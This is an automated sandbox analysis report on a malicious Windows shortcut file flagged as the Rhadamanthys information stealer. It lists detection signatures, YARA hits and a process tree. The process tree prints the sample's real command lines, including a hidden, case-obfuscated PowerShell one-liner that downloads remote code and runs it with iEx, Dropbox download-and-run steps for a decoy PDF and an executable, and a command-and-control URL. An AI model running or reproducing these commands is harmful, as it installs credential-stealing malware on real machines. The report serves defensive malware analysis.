Edit tour
Windows
Analysis Report
QhR8Zp6fZs.lnk
Overview
General Information
Sample name: | QhR8Zp6fZs.lnkrenamed because original name is a hash value |
Original sample name: | 5e4e0d19fd820dac35ac9d01798e8cc2e7f1fad289c5e5b03fe5bcf72eb072d1.lnk |
Analysis ID: | 1578255 |
MD5: | 5081561ebdd155b2ee958ff4f942f700 |
SHA1: | 04952608e89cc2df9e2d4b905ac51af6f30f0764 |
SHA256: | 5e4e0d19fd820dac35ac9d01798e8cc2e7f1fad289c5e5b03fe5bcf72eb072d1 |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 6716 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias aac b48 curl ; sal avc0f 6 iEx ; av c0f6(aacb4 8 -Uri htt ps://23glc rtmzxqgwfp q3oujitt.n grok.pizza /api/secur e/921edf0e 4034146666 9afb0baebb 3d6e -UseB asicParsin g) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6972 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias aacb48 curl ; sa l avc0f6 i Ex ; avc0f 6(aacb48 - Uri https: //23glcrtm zxqgwfpq3o ujitt.ngro k.pizza/ap i/secure/9 21edf0e403 41466669af b0baebb3d6 e -UseBasi cParsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 1436 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/zlv5288p id16pw3i15 rdx/Docume nts-about- company-in formation- and-job-de scriptions -4.pdf?rlk ey=e9yfqlf 53smb0p94l fg3trrkx&d l=1 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 7448 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=15 04 --field -trial-han dle=2152,i ,158651335 0428139612 3,89505861 8401071371 ,262144 /p refetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) - cmd.exe (PID: 8772 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\7492 09598.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8924 cmdline:
powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/z lv5288pid1 6pw3i15rdx /Documents -about-com pany-infor mation-and -job-descr iptions-4. pdf?rlkey= e9yfqlf53s mb0p94lfg3 trrkx&dl=1 ' -OutFile $RandomPD F; Start-P rocess -Fi lePath 'ms edge.exe' -ArgumentL ist '--kio sk', $Rand omPDF; Inv oke-WebReq uest -Uri 'https://w ww.dropbox .com/scl/f i/uv9rtex9 4bi18x6hfw nvm/runner .exe?rlkey =ohh5enlv6 dylr9jqxqw sffkja&dl= 1' -OutFil e $RandomE XE; Start- Process -F ilePath $R andomEXE; if (Test-P ath $Rando mEXE) { In voke-WebRe quest -Uri 'https:// 23glcrtmzx qgwfpq3ouj itt.ngrok. pizza/meta data/921ed f0e4034146 6669afb0ba ebb3d6e'; }" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 1280 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\6d0157 c6-3d7d-48 ab-8ec3-f1 e0d1f3d02e .pdf MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8828 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=22 12 --field -trial-han dle=2144,i ,122268703 3613579106 4,66466120 5733019185 8,262144 / prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) - 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe (PID: 1596 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\148337 f5-05f1-4a aa-b5bc-69 ff3b8bcafe .exe" MD5: F7A506F00E525E6D23AEE43D34219625) - 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe (PID: 8812 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\148337 f5-05f1-4a aa-b5bc-69 ff3b8bcafe .exe" MD5: F7A506F00E525E6D23AEE43D34219625) - fontdrvhost.exe (PID: 5984 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 9048 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 8756 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 9 048 -s 140 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 5476 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 8 812 -s 440 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 6492 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7312 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/z lv5288pid1 6pw3i15rdx /Documents -about-com pany-infor mation-and -job-descr iptions-4. pdf?rlkey= e9yfqlf53s mb0p94lfg3 trrkx&dl=1 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 7692 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=27 80 --field -trial-han dle=2484,i ,147250359 9949234287 0,33524325 8719073655 1,262144 / prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8904 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 5296 --fie ld-trial-h andle=2484 ,i,1472503 5999492342 870,335243 2587190736 551,262144 /prefetch :8 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8916 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=5284 --field-t rial-handl e=2484,i,1 4725035999 492342870, 3352432587 190736551, 262144 /pr efetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB) - identity_helper.exe (PID: 9204 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 060 --fiel d-trial-ha ndle=2484, i,14725035 9994923428 70,3352432 5871907365 51,262144 /prefetch: 8 MD5: F8CEC3E43A6305AC9BA3700131594306) - identity_helper.exe (PID: 6664 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 060 --fiel d-trial-ha ndle=2484, i,14725035 9994923428 70,3352432 5871907365 51,262144 /prefetch: 8 MD5: F8CEC3E43A6305AC9BA3700131594306) - msedge.exe (PID: 7548 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_collecti ons.mojom. Collection sDataManag er --lang= en-GB --se rvice-sand box-type=c ollections --mojo-pl atform-cha nnel-handl e=7920 --f ield-trial -handle=24 84,i,14725 0359994923 42870,3352 4325871907 36551,2621 44 /prefet ch:8 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 7488 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=8232 --field-t rial-handl e=2484,i,1 4725035999 492342870, 3352432587 190736551, 262144 /pr efetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8636 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=675 2 --field- trial-hand le=2484,i, 1472503599 9492342870 ,335243258 7190736551 ,262144 /p refetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |